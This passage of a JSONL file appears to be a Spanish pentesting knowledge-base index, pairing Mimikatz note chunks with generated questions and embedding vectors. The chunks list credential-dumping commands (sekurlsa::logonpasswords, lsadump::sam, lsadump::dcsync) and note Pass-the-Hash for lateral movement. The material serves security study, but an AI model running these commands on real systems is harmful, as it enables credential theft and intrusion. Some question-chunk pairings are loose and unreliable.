-0.03019, -0.0091, -0.0395]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicaciΓ³n)\n```", "indexar": "cual es una herramienta para obtener hashes NTLM y credenciales en claro?", "v": [-0.15698, -0.05402, -0.01241, -0.017, 0.11559, -0.14077, -0.15372, 0.12411, -0.07369, 0.07069, -0.12462, 0.05129, -0.02768, -0.0273, 0.02313, 0.16672, -0.03228, -0.13448, -0.00639, 0.07142, -0.1175, -0.06323, -0.24502, -0.06, -0.10029, -0.07816, -0.01804, 0.04239, -0.16527, 0.12973, -0.02387, -0.02956, -0.10198, 0.04676, 0.00846, 0.02334, -0.06393, 0.08792, -0.03821, 0.17698, 0.02965, 0.12107, -0.01057, 0.0859, 0.09939, -0.07684, -0.08518, 0.03715, 0.04594, -0.09808, -0.00583, -0.02982, -0.19717, -0.11742, 0.0043, -0.10842, 0.17609, -0.04091, -0.03447, -0.10305, -0.12791, -0.02022, -0.0005, -0.12561, -0.09713, -0.07023, 0.01725, -0.07502, -0.08116, 0.04377, -0.09535, 0.04345, 0.07162, -0.04344, -0.01945, -0.00889, -0.02529, 0.01181, 0.07906, 0.05699, 0.11718, -0.09449, -0.02094, -0.00174, -0.09043, -0.06795, 0.04095, -0.0318, -0.00376, 0.04402, -0.03281, 0.08813, -0.02647, 0.00623, 0.04438, -0.03328, 0.04807, -0.0393, -0.01243, -0.02309, 0.07611, -0.09759, -0.07824, 0.10806, -0.09672, -0.00594, -0.00419, 0.0308, -0.08297, 0.06118, 0.13004, 0.01743, -0.01882, 0.04907, 0.01552, 0.06963, 0.00688, -0.03373, -0.00887, -0.06222, 0.0331, 0.01426, -0.00696, 0.00636, 0.02506, 0.02066, -0.08088, 0.06744, -0.06755, -0.09179, 0.02726, -0.05881, -0.06719, 0.01857, 0.04819, -0.05957, -0.0032, -0.09646, -0.01284, -0.04363, 0.06867, 0.0005, -0.02543, -0.09367, 0.024, 0.02143, -0.02583, -0.08821, 0.0192, -0.05377, 0.06667, 0.00902, 0.00591, 0.00117, -0.03162, 0.00927, 0.0029, 0.0175, -0.13002, 0.04338, -0.01695, -0.05297, 0.07118, 0.02892, 0.00508, -0.04962, 0.0357, -0.01106, 0.03919, 0.01691, 0.02233, -0.04181, 0.00237, -0.01599, 0.0247, -0.06123, -0.02007, -0.00627, -0.04501, -0.11124, 0.04434, 0.03471, 0.00688, -0.02842, 0.0395, -0.01642, 0.0168, 0.03879, -0.03407, -0.00982, 0.02844, 0.02199, -0.03467, -0.05227, 0.04757, 0.02997, 0.02022, -0.06705, 0.03465, -0.01051, -0.05923, -0.00771, 0.00615, -0.0545, 0.04504, 0.05434, -0.02277, -0.01682, -0.0145, 0.0527, 0.05329, -0.00233, 0.03306, -0.04045, -0.05732, -0.0067, -0.01053, 0.02596, -0.03275, -0.0091, 0.00136, 0.00998, 0.02585, -0.01213, -0.01729, -0.01638, 0.00169, 0.05343, -0.01656, 0.00391, 0.01674, -0.03686, -0.01998, -0.00416, 0.0229, -0.01294, 0.02876, 0.01647, -0.03161, -0.04887, 0.00431, 0.02188, 0.02075, -0.01143, -0.02289, -0.0018, -0.03235, 0.00298, -0.03181, -0.02598, -0.01384, -0.01232, 0.06002, -0.02928, 0.02499, -0.02526]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicaciΓ³n)\n```", "indexar": "con que puedo descargar el SAM local del sistema?", "v": [-0.07303, 0.09263, -0.0646, -0.13762, -0.11294, -0.09904, -0.01285, -0.02822, -0.08796, 0.08746, -0.20604, -0.08351, -0.00678, -0.14702, 0.03093, 0.10532, 0.00059, -0.08551, -0.01679, 0.0409, 0.09358, -0.03524, -0.02211, -0.06933, 0.05838, 0.10222, 0.01516, -0.05213, -0.13466, -0.06454, 0.09273, 0.03332, 0.06893, -0.03124, -0.04913, -0.03525, 0.14051, 0.0241, 0.02882, -0.00486, 0.08647, -0.04979, -0.06836, 0.11115, 0.08215, -0.06601, -0.00949, -0.11431, 0.07217, -0.15675, -0.22674, 0.03605, -0.07402, -0.13685, -0.01124, -0.14349, 0.04984, -0.0931, 0.01528, -0.01668, 0.02643, 0.03402, 0.09695, 0.00127, 0.13885, 0.03782, 0.06562, 0.06144, -0.0192, 0.06072, 0.07603, -0.03446, 0.10421, -0.03703, -0.07951, 0.0784, -0.0167, -0.07191, 0.11317, -0.06262, 0.05631, -0.02639, 0.02705, 0.03397, 0.01969, -0.03284, 0.01394, -0.04405, 0.05991, -0.0735, 0.07976, -0.11312, 0.12191, 0.09182, -0.0054, -0.07644, -0.04139, 0.02437, -0.05861, 0.0706, -0.05246, -0.09319, 0.01644, 0.04593, 0.01392, -0.05117, 0.05879, 0.00302, 0.08852, -0.02037, -0.02056, -0.0102, 0.0303, 0.06081, -0.0377, -0.0733, 0.01387, 0.10402, -0.09892, 0.05679, 0.02187, -0.01066, -0.02663, -0.10958, 0.07108, -0.05725, 0.01133, 0.06556, -0.00627, 0.06403, 0.0872, -0.04029, -0.02055, 0.00653, 0.01582, -0.11644, 0.02418, -0.00219, -0.04431, -0.01325, -0.02539, 0.00697, 0.02891, -0.02715, 0.02066, -0.01093, -0.01516, -0.03321, 0.02586, -0.09045, 0.00493, 0.04471, 0.01319, -0.0171, -0.03321, 0.05143, 0.13529, -0.01798, 0.02854, -0.01053, 0.02845, 0.0426, 0.0272, -0.02365, -0.07769, -0.02803, -0.05056, 0.02641, 0.04662, 0.02132, -0.05951, 0.07771, -0.01028, -0.04748, 0.0087, -0.04216, 0.03011, -0.06803, 0.00447, 0.02213, -0.05746, 0.06455, 0.03402, 0.03579, -0.05223, -0.019, -0.02189, 0.06174, 0.01416, 0.01104, 0.0277, 0.03627, -0.02468, 0.05626, 0.00101, -0.00088, -0.03591, -0.02075, -0.01412, 0.03215, -0.12907, 0.00251, -0.02852, -0.01342, 0.05324, 0.06082, 0.01865, 0.05985, 0.01092, 0.07241, -0.02, 0.03097, 0.05255, -0.04754, -0.07443, -0.02972, -0.02607, 0.00915, 0.02991, -0.03206, -0.00265, 0.01575, 0.12752, 0.05452, -0.0364, -0.01654, 0.01805, 0.04266, 0.02467, 0.024, 0.0311, 0.02698, -0.01834, -0.04079, 0.03086, -0.01044, -0.02715, 0.03058, -0.04768, -0.03701, 0.05127, 0.13078, 0.03054, -0.076, -0.06953, -0.05164, -0.05681, -0.09693, 0.04689, -0.09484, -0.02508, 0.04249, 0.06923, 0.00348, 0.00112, 0.02134]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicaciΓ³n)\n```", "indexar": "que programa me sirve para intentar autenticarse con DCSync?", "v": [-0.09005, 0.05197, -0.26505, -0.11681, 0.10863, -0.14895, -0.14866, 0.00407, -0.04262, 0.15315, 0.03285, -0.13372, -0.09669, -0.222, -0.01504, -0.03402, 0.04565, 0.01433, 0.00119, -0.0481, 0.11145, -0.14315, 0.01339, -0.16298, 0.13818, 0.02409, -0.06624, 0.04638, 0.00099, -0.04866, 0.11046, 0.00513, 0.17004, -0.01946, 0.06078, -0.09205, -0.05586, 0.01738, 0.10264, -0.01263, 0.06515, -0.00754, -0.1053, 0.06752, 0.02346, 0.01948, 0.15827, -0.02513, -0.03176, -0.06567, -0.13297, -8e-05, -0.06045, 0.1138, -0.06297, -0.0534, -0.116, 0.0242, 0.01835, -0.0704, -0.03143, 0.02185, -0.00526, -0.03857, 0.03785, 0.11303, 0.05717, -0.06323, -0.06915, 0.04946, -0.08497, 0.07578, 0.06739, -0.08036, 0.02223, -0.03941, 0.02824, -0.11571, 0.10402, -0.03343, 0.06019, -0.00461, 0.05522, 0.04404, -0.00225, 0.04024, 0.10631, -0.00122, 0.01332, -0.06997, 0.08937, 0.07939, -0.0408, 0.0611, 0.08079, -0.06116, 0.10336, 0.00466, 0.06377, 0.03332, 0.07555, -0.07682, -0.04038, 0.06549, -0.09833, 0.06287, 0.10108, -0.03039, -0.01885, 0.08812, -0.01447, 0.03115, -0.06103, 0.01133, -0.05102, 0.00166, -0.05407, -0.04127, 0.01561, -0.03179, -0.1022, -0.00499, -0.11984, -0.00102, 0.04266, 0.09701, 0.00177, 0.07443, -0.04768, 0.07383, 0.01885, -0.05252, 0.01214, -0.02722, 0.01112, -0.07622, 0.03279, -0.05253, -0.04758, 0.03763, 0.03789, 0.09793, 0.05839, 0.05107, 0.01541, 0.00399, 0.02533, -0.02958, -0.01796, 0.03492, 0.02917, 0.00116, -0.00362, 0.03035, -0.09989, -0.0312, 0.03019, 0.00014, -0.02554, -0.00233, -0.05046, 0.07455, 0.01018, -0.04881, -0.01703, -0.04636, 0.00935, -0.02782, 0.08948, 0.10124, -0.03735, 0.0454, 0.07049, -0.06791, -0.04843, 0.04904, -0.00128, -0.08308, 0.05597, -0.00695, -0.01237, 0.01434, 0.06886, 0.03273, -0.02963, -0.02797, -0.06835, 0.01767, 0.00244, 0.00151, -0.00929, -0.02466, 0.01164, -0.02525, 0.01699, -0.01685, -0.02207, 0.0088, 0.03919, -0.03074, -0.05341, -0.02045, 0.00804, 0.01611, 0.07642, 0.08608, -0.00308, 0.02399, 0.01405, 0.06867, 0.01629, -0.00818, 0.05742, -0.00035, -0.00567, -0.03136, 0.00541, 0.02742, 0.04688, 0.05608, -0.04313, -0.05429, -0.00837, 0.05997, 0.01051, -0.07432, 0.06346, -0.03385, -0.0104, 0.0064, -0.01486, -0.01275, -0.03002, -0.00765, 0.00606, 0.01604, -0.01295, -0.00136, 0.02205, -0.08362, 0.00508, 0.01147, -0.06902, -0.0156, -0.00968, 0.02738, 0.00792, 0.00621, 0.01626, 0.02091, -0.02282, -0.03697, 0.01128, 0.00502, 0.03272, 0.02538]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nNecesitas ser **admin/SYSTEM** en la mΓ‘quina (Privesc Windows / Potato attacks).", "indexar": "quΓ© herramienta necesito para obtener privilegios de administrador en Windows?", "v": [0.04012, 0.11588, -0.07473, -0.23446, 0.08574, -0.06324, -0.04523, -0.12571, -0.14413, -0.06923, 0.01704, -0.07468, -0.05751, -0.07422, -0.03926, 0.01821, 0.09358, -0.13388, 0.02543, 0.11811, 0.0319, -0.05132, -0.05551, 0.02151, -0.09177, -0.02807, 0.08181, -0.03583, -0.16146, 0.12499, 0.00621, -0.01938, -0.04507, -0.05848, -0.02513, 0.05793, -0.0144, 0.1126, -0.01077, 0.08504, 0.0655, 0.12496, -0.08547, 0.09682, 0.07056, -0.06867, 0.00281, -0.05529, 0.0748, 0.04843, 0.0381, -0.1789, -0.09565, -0.09975, 0.11393, -0.05491, 0.13822, -0.08908, 0.0297, -0.00766, -0.12266, 0.02766, -0.03577, 0.05548, -0.10297, -0.01397, 0.10413, -0.06485, -0.00385, 0.12738, -0.12624, -0.02977, 0.07176, 0.02676, 0.03083, 0.04474, -0.03027, -0.00103, 0.02724, -0.02417, 0.10114, 0.11002, -0.06515, -0.06834, -0.0821, -0.17186, 2e-05, 0.00954, 0.03347, -0.07397, 0.02249, -0.04229, -0.07989, -0.01701, 0.06083, -0.06529, 0.05338, 0.02419, -0.01449, 0.08162, 0.06094, -0.12983, -0.06189, 0.13349, -0.02313, 0.06261, -0.03512, -0.10213, -0.10001, -0.01098, 0.00783, 0.04752, 0.02268, 0.06018, -0.00843, 0.11352, -0.01341, -0.07574, -0.03814, -0.02246, -0.02103, 0.01935, -0.04748, -0.02768, 0.07969, -0.0807, 0.00304, 0.09672, -0.04758, -0.01282, 0.01554, -0.10229, -0.06773, -0.03039, -0.07524, 0.07433, -0.00762, -0.0643, -0.00325, -0.08706, -0.01202, -0.0125, 0.01145, -0.08662, 0.07304, 0.00581, 0.04002, 0.03367, -0.04973, -0.05651, 0.0459, -0.11129, -0.03329, 0.02691, -0.06252, -0.03822, 0.00364, 0.07439, -0.02103, 0.00776, -0.00198, -0.11662, -0.00728, -0.00873, 0.03232, -0.0672, 0.00831, -0.00846, 0.01213, -0.03919, -0.00921, 0.01304, 0.00486, 0.00511, -0.01023, -0.01318, 0.01551, 0.0156, -0.03594, -0.0384, -0.0378, 0.06012, 0.03269, 0.03701, -0.05024, -0.0128, -0.03025, 0.0531, -0.03936, 0.06626, 0.01859, 0.00935, 0.06503, -0.08707, 0.04427, 0.017, -0.01229, -0.06468, 0.01837, -0.02398, -0.03437, -0.02124, -0.01716, -0.05146, 0.07169, 0.00094, 0.00658, -0.00151, 0.04313, 0.07184, 0.0357, 0.04348, -0.00604, -0.01136, 0.02641, -0.04528, 0.04956, 0.03085, -0.00479, -0.04917, 0.03831, -0.01153, 0.03666, 0.02626, 0.0528, -0.05278, -0.07264, 0.02354, -0.00722, 0.02126, 0.02263, -0.00619, 0.02922, 0.00291, 0.0482, -0.03276, 0.04407, -0.06973, 0.01356, 0.02138, -0.02587, 0.0677, 0.03927, -0.03648, -0.08447, -0.0534, -0.00317, -0.02594, -0.05201, -0.07527, 0.04665, -0.04157, 0.02934, -0.04038, -0.02686, 0.04532]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nNecesitas ser **admin/SYSTEM** en la mΓ‘quina (Privesc Windows / Potato attacks).", "indexar": "cΓ³mo puedo ejecutar ataques como Potato en un entorno Windows?", "v": [-0.13942, 0.12762, -0.05889, -0.09122, 0.01238, 0.00297, 0.14676, -0.01831, 0.03242, -0.05838, -0.02476, -0.00699, -0.0047, 0.02407, -0.08345, 0.01619, 0.09396, -0.02445, 0.04493, -0.05282, -0.07075, -0.08448, 0.00062, 0.0449, 0.04756, 0.09834, 0.019, 0.13665, -0.13767, -0.07068, -0.04298, 0.008, 0.00691, -0.04398, -0.02137, -0.00985, -0.01774, 0.08162, 0.08353, 0.06131, -0.04328, 0.09503, -0.14127, 0.04126, 0.10668, 0.01181, 0.09462, -0.08616, 0.11559, -0.1045, -0.01138, 0.01507, -0.11275, -0.10984, 0.09448, -0.02422, 0.07687, -0.10782, 0.07567, 0.01449, -0.06384, 0.10196, 0.00946, 0.00038, 0.07034, -0.0309, 0.00246, 0.00881, 0.02485, 0.15234, -0.05644, -0.0244, -0.00011, 0.02656, 0.0159, 0.03137, -0.01955, 0.04503, 0.06543, -0.01741, -0.01873, 0.06042, -0.035, -0.09968, -0.11934, -0.06026, -0.02427, -0.10033, 0.00389, -0.15066, 0.12981, -0.0536, -0.08327, 0.03683, -0.01346, -0.00848, -0.03926, -0.09937, -0.03851, 0.02772, -0.05055, -0.1013, -0.10027, 0.08686, 0.0033, 0.08866, -0.0409, -0.06612, -0.07729, -0.19996, -0.05377, 0.032, -0.0321, -0.11492, -0.02186, -0.06546, -0.01416, -0.06206, 0.07364, -0.00133, -0.14419, 0.02154, -0.08161, 0.02984, -0.00673, -0.00411, -0.02546, 0.02389, -0.09115, -0.01432, 0.01664, 0.02619, 0.058, -0.01585, -0.07326, 0.11113, 0.00433, -0.11779, 0.00534, -0.08893, 0.10381, 0.10416, 0.07624, -0.02659, 0.02532, 0.05125, 0.00027, 0.00114, -0.06438, -0.00429, 0.11361, -0.01518, -0.02981, 0.04353, -0.09949, -0.05471, -0.02229, 0.03796, 0.08347, 0.06612, 0.05238, 0.03321, -0.07504, 0.0018, -0.00706, -0.0043, -0.00837, -0.032, 0.04512, 0.01937, -0.04591, 0.04465, -0.02174, -0.06468, 0.02225, -0.03579, 0.0062, -0.0427, -0.00286, 0.02106, -0.10359, -0.01259, -0.04346, -0.02512, -0.03595, -0.01381, 0.05135, 0.04168, -0.01644, 0.0423, -0.08126, 0.02283, 0.06873, -0.04923, 0.0519, -0.0341, -0.09835, -0.00475, -0.03946, -0.01487, 0.0053, -0.06367, -0.04351, -0.05279, 0.08311, 0.09731, -0.0754, 0.03542, -0.03321, 0.08033, 0.04354, -0.03074, 0.06122, -0.01449, -0.10127, -0.06015, 0.05323, -0.0443, 0.01517, 0.01369, -0.00428, 0.03242, 0.07951, -0.02562, -0.00412, -0.05334, -0.09761, -0.06801, -0.00209, 0.02867, -0.01463, 0.01791, -0.01562, -0.00944, 0.01821, -0.00704, 0.00648, -0.05905, -0.06778, 0.00311, -0.00677, 0.04884, -0.01748, -0.11125, -0.06217, -0.04501, -0.07785, 0.00446, -0.01755, -0.10035, 0.01184, 0.00817, 0.03749, -0.01071, -0.04636, 0.04148]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nNecesitas ser **admin/SYSTEM** en la mΓ‘quina (Privesc Windows / Potato attacks).", "indexar": "con quΓ© programa puedo acceder al sistema root en mΓ‘quinas vulnerables?", "v": [0.05965, 0.02197, -0.10163, -0.22051, -0.02401, 0.01551, -0.02193, -0.00534, -0.10842, -0.06854, -0.09407, -0.05085, 0.07905, -0.05521, 0.07277, 0.01322, -0.05393, -0.06717, -0.06747, 0.04763, -0.03691, -0.09719, -0.04863, 0.0103, 0.01292, 0.22065, 0.06907, 0.00467, -0.11649, 0.03565, 0.00319, -0.00107, 0.06374, -0.02099, -0.05792, -0.01966, -0.01919, 0.14856, 0.12547, -0.00251, 0.03546, -0.05183, -0.07187, 0.0134, 0.18584, -0.11176, 0.0044, -0.06529, 0.05283, -0.03755, -0.10748, -0.11428, -0.04232, -0.09572, 0.06528, -0.13887, 0.04862, -0.08868, -0.04059, 0.05893, -0.06947, 0.1444, 0.00927, -0.02872, 0.01553, -0.0036, 0.08391, -0.0244, -0.07283, 0.07119, -0.02264, -0.05583, 0.13295, -0.05957, 0.01024, 0.01844, 0.01133, -0.01665, 0.00993, -0.09742, -0.01067, 0.03494, 0.01786, 0.03004, -0.00863, -0.03261, 0.00527, 0.00828, -0.0248, -0.11161, 0.08488, 0.02058, 0.00926, 0.0313, 0.13595, 0.00636, 0.05948, 0.00828, -0.06315, 0.03183, 0.01878, -0.04625, -0.06129, 0.18003, -0.0574, -0.03901, 0.05868, -0.01344, -0.01174, -0.0928, -0.02943, -0.00453, -0.04045, -0.03968, -0.06911, 0.04276, -0.06691, 0.08434, 0.03965, -0.06766, -0.07748, 0.03095, -0.01355, -0.04814, 0.13182, -0.01274, 0.01125, 0.12252, -0.04716, 0.00558, 0.03962, 0.00581, -0.01752, 0.03549, -0.01591, -0.09521, 0.01674, -0.05644, -0.00633, -0.01603, -0.01876, 0.06262, 0.04238, -0.06938, 0.03655, -0.04055, 0.03874, -0.09149, 0.01386, -0.03638, -0.02691, 0.01057, 0.00294, 0.0549, -0.07926, -0.04754, 0.03459, 0.00412, -0.04072, -0.00188, -0.0777, -0.06285, -0.11027, -0.00376, -0.03684, 0.03886, 0.05705, -0.00863, 0.08158, 0.06315, -0.05198, 0.08584, 0.10711, 0.06753, 0.0118, -0.0474, -0.00845, -0.07622, 0.05605, 0.0251, -0.06626, 0.03667, 0.10285, -0.04824, -0.04106, 0.0173, -0.04253, 0.04524, 0.08375, 0.03718, 0.02843, 0.02927, -0.00929, 0.012, 0.08105, 0.02781, -0.06174, 0.03447, -0.01947, -0.01096, -0.09311, 0.06537, 0.0338, -0.04568, 0.06315, 0.09957, 0.05962, -0.06399, 0.01561, 0.12568, 0.02383, 0.04468, 0.05768, 0.02971, -0.03746, 0.04063, -0.1042, 0.0638, 0.06882, -0.01772, 0.04166, -0.03819, 0.02366, 0.08113, 0.02728, -0.11682, 0.05118, 0.01824, 0.06095, -0.01124, -0.0132, -0.09067, 0.00447, -0.00893, 0.02066, -0.0552, -0.02617, -0.01212, -0.03748, -0.03404, 0.01455, 0.10733, 0.04334, -0.07336, -0.02317, -0.00249, -0.03764, -0.05272, -0.00734, -0.0398, -0.01943, 0.05415, 0.0025, -0.07774, 0.01884, 0.0523]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- Hash NTLM β†’ Pass-the-Hash / Impacket β†’ Movimiento lateral.\n- PregΓΊntale a BloodHound quΓ© hacer con ese usuario.\n\nRelacionado: Kerberos Β· secretsdump Β· OSCP MOC", "indexar": "que herramienta puedo usar para realizar el movimiento lateral basΓ‘ndome en un hash NTLM?", "v": [-0.12593, -0.03133, -0.17005, -0.15005, -0.15007, 0.00319, -0.19085, 0.11962, -0.09501, 0.0803, -0.15959, -0.06387, 0.03539, 0.01485, 0.00205, 0.11941, 0.04782, -0.10373, -0.11655, -0.02176, -0.11824, -0.05713, -0.14767, -0.033, 0.03602, -0.00145, 0.01549, -0.03769, -0.22081, 0.04146, -0.08238, -0.01298, 0.02711, -0.04119, 0.02952, -0.15996, 0.01474, 0.02433, 0.06575, 0.12221, -0.03915, 0.1136, -0.11117, 0.05045, -0.00664, 0.01336, -0.06862, -0.04346, -0.00838, -0.10521, 0.02301, -0.00106, -0.13751, -0.09122, -0.02743, -0.15799, 0.22592, -0.08477, -0.04839, -0.12878, 0.01478, 0.00039, 0.00934, -0.03616, -0.02655, -0.09815, 0.01624, -0.08069, -0.08033, 0.02756, -0.06862, 0.08983, 0.00905, 0.05418, -0.06765, 0.07123, 0.03388, -0.01025, 0.01358, 0.05453, 0.05599, 0.03249, -0.08268, 0.02462, -0.11455, -0.11999, 0.06773, -0.07795, 0.04858, 0.0562, 0.02395, 0.04903, -0.05928, -0.02403, 0.02934, 0.02511, -0.05199, -0.04105, -0.03974, -0.0377, 0.16978, -0.04326, -0.03427, 0.03771, 0.01091, -0.07168, 0.02097, 0.00482, -0.05268, 0.05989, 0.0857, -0.03125, -0.06827, -0.02066, -0.02542, 0.06842, -0.1108, -0.02224, -0.04777, -0.02572, 0.11971, -0.0004, -0.01484, -0.09693, 0.02365, -0.03405, -0.02636, 0.09665, -0.07398, -0.03724, 0.09491, -0.0368, -0.07744, -0.00385, -0.03233, -0.01631, 0.02765, -0.04147, 0.06441, -0.03857, 0.06251, 0.03278, -0.06059, -0.07466, 0.0594, 0.02858, 0.02912, -0.00137, -0.02358, -0.00556, 0.05878, -0.06658, 0.02405, -0.01109, -0.02338, 0.03466, -0.02073, -0.0053, -0.139, 0.00626, -0.03913, 0.03178, -0.0106, -0.0178, 0.02324, -0.08039, 0.03622, -0.00304, 0.00498, 0.02183, 0.02841, 0.03734, 0.02326, -0.0168, 0.04421, -0.04675, -0.04069, 0.04561, 0.00116, -0.07117, 0.02818, 0.0362, -0.01663, -0.03958, 0.08443, -0.02494, 0.05021, -0.00667, -0.00903, 0.05133, -0.02942, 0.07342, -0.00416, -0.04971, 0.01004, -0.003, 0.00066, -0.04881, 0.08011, 0.01449, -0.06933, 0.01059, -0.00309, -0.05228, 0.03984, 0.04126, -0.04601, 0.00107, 0.00858, 0.00732, 0.04004, -0.04839, 0.07545, 0.02053, -0.03616, -0.00325, -0.01519, 0.01644, -0.03203, -0.00257, 0.0092, 0.02737, 0.05034, 0.00944, 0.00572, -0.00783, 0.02621, 0.01068, -0.02819, 0.00896, 0.03358, 0.00373, -0.00245, -0.02436, 0.00691, -0.02136, 0.05753, -0.0068, -0.05891, -0.02074, -0.03261, 0.02501, -0.00448, 0.01572, -0.02234, -0.02618, -0.03776, 0.04143, -0.00886, -0.04328, 0.03678, -0.00295, 0.05131, -0.04236, -0.00566, 0.01594]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- Hash NTLM β†’ Pass-the-Hash / Impacket β†’ Movimiento lateral.\n- PregΓΊntale a BloodHound quΓ© hacer con ese usuario.\n\nRelacionado: Kerberos Β· secretsdump Β· OSCP MOC", "indexar": "cual es una tΓ©cnica para analizar los permisos de un usuario en la red?", "v": [0.05111, 0.04527, -0.03096, -0.14291, 0.06169, -0.08193, -0.07097, -0.09072, -0.05419, -0.08325, -0.05399, -0.09569, 0.00321, -0.01899, 0.13357, -0.10767, 0.07385, -0.00152, 0.14749, 0.04923, 0.08659, -0.09629, -0.14096, 0.06794, -0.02849, -0.01037, 0.12208, -0.14849, -0.10452, -0.00836, -0.01505, 0.07599, 0.0274, -0.11147, -0.01899, 0.06048, 0.0438, 0.01686, -0.04104, 0.07475, -0.06584, -0.01977, -0.14923, 0.00639, 0.0565, -0.0457, -0.05657, 0.01698, -0.0351, -0.00901, 0.03667, -0.00957, -0.13188, -0.10964, 0.02616, -0.07217, 0.18673, -0.10183, 0.01904, -0.02413, 0.00547, -0.02931, 0.01926, 0.08379, 0.02297, -0.05959, 0.03341, 0.01145, -0.00661, 0.07175, 0.02537, 0.07022, -0.09034, -0.00977, 0.0835, 0.08624, -0.10813, 0.03678, 0.10985, -0.03938, 0.04299, 0.0524, -0.14473, -0.00464, -0.10132, -0.12363, 0.06046, -0.08642, -0.01411, -0.06583, 0.05304, 0.01594, 0.07945, -0.04599, 0.09734, -0.02585, 0.06434, 0.01194, -0.07071, 0.04321, 0.04173, 0.02112, -0.09718, 0.06649, -0.00063, 0.10639, 0.03485, -0.09335, 0.00338, -0.02367, -0.05656, 0.04654, -0.04139, 0.00211, -0.00311, -0.03794, -0.03508, -0.13231, -0.11171, -0.05339, -0.00127, 0.01989, -0.02038, -0.02642, 0.02008, -0.09722, -0.04542, 0.06361, -0.01567, -0.00482, -0.02422, 0.02363, -0.05675, 0.00437, -0.09459, 0.07549, -0.00983, -0.0957, -0.13149, -0.0192, -0.00984, 0.08948, -0.06829, 0.0027, 0.06051, 0.0898, -0.00739, -0.0694, -0.11068, -0.06375, 0.00848, -0.00789, -0.03932, 0.06163, -0.00227, 0.0728, -0.05422, -0.10268, -0.04764, 0.1088, 0.04541, 0.01831, 0.03041, -0.00883, 0.00709, -0.05585, -0.03936, -0.06702, 0.06471, -0.01224, -0.04429, -0.00424, -0.08641, -0.04656, 0.05737, -0.05489, -0.03347, -0.12803, -0.03574, -0.09535, -0.02322, -0.04577, -0.03646, -0.05554, -0.01125, -0.0279, -0.05113, -0.00067, 0.05933, 0.0483, -0.00996, 0.05595, -0.01558, -0.01595, 0.03497, -0.01405, 0.01081, -0.0109, -0.01167, -0.05644, -0.04022, 0.03437, -0.03852, -0.0248, 0.00915, -0.02937, -0.0204, 0.03938, -0.02554, -0.00703, -0.00863, -0.05, 0.05263, -0.04402, -0.0728, -0.01733, 0.01897, -0.00196, -0.00648, -0.03241, 0.10701, 0.02653, 0.06519, 0.01447, -0.01636, 0.00895, 0.07996, -0.00437, 0.00224, 0.05067, -0.01108, 0.02564, -0.02651, -0.00283, 0.04167, 0.04327, 0.06727, 0.00887, -0.03794, -0.05648, 0.06049, 0.08422, -0.0424, -0.02637, 0.00238, -0.04664, -0.12904, 0.02326, -0.02118, -0.12551, 0.03968, 0.04775, 0.04138, -0.049, 0.09167, -0.09109]} +{"tipo": "pregunta", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- Hash NTLM β†’ Pass-the-Hash / Impacket β†’ Movimiento lateral.\n- PregΓΊntale a BloodHound quΓ© hacer con ese usuario.\n\nRelacionado: Kerberos Β· secretsdump Β· OSCP MOC", "indexar": "con que programa puedo descubrir quΓ© hacer con ese usuario especΓ­fico?", "v": [-0.15306, 0.15032, -0.16626, -0.04495, 0.06327, -0.08578, 0.01388, -0.08798, -0.14644, -0.18799, -0.00739, 0.02393, -0.11261, -0.10597, 0.02189, -0.02331, 0.13249, 0.00432, 0.08642, 0.06147, 0.07105, -0.11004, -0.0238, -0.05596, -0.03182, -0.03882, 0.04007, 0.00341, 0.018, -0.0344, -0.01745, 0.13994, 0.00407, -0.13392, -0.02309, 0.04679, 0.08939, -0.0138, -0.04151, 0.01375, 0.09759, 0.01848, -0.09136, 0.1127, 0.10081, 0.00182, -0.05002, -0.06938, -0.01588, 0.02711, 0.03261, 0.01557, -0.08323, -0.03575, 0.09145, -0.11566, 0.03793, -0.13065, 0.00566, 0.01874, 0.00666, 0.03961, 0.05085, 0.01102, 0.07051, -0.04436, 0.07584, 0.02931, -0.00608, 0.01738, -0.02374, -0.0198, 0.05803, -0.05256, 0.07162, 0.10644, 0.0018, 0.0047, 0.09015, -0.06449, -0.02637, 0.01087, 0.02009, 0.00861, -0.0456, -0.02661, 0.07221, -0.05519, 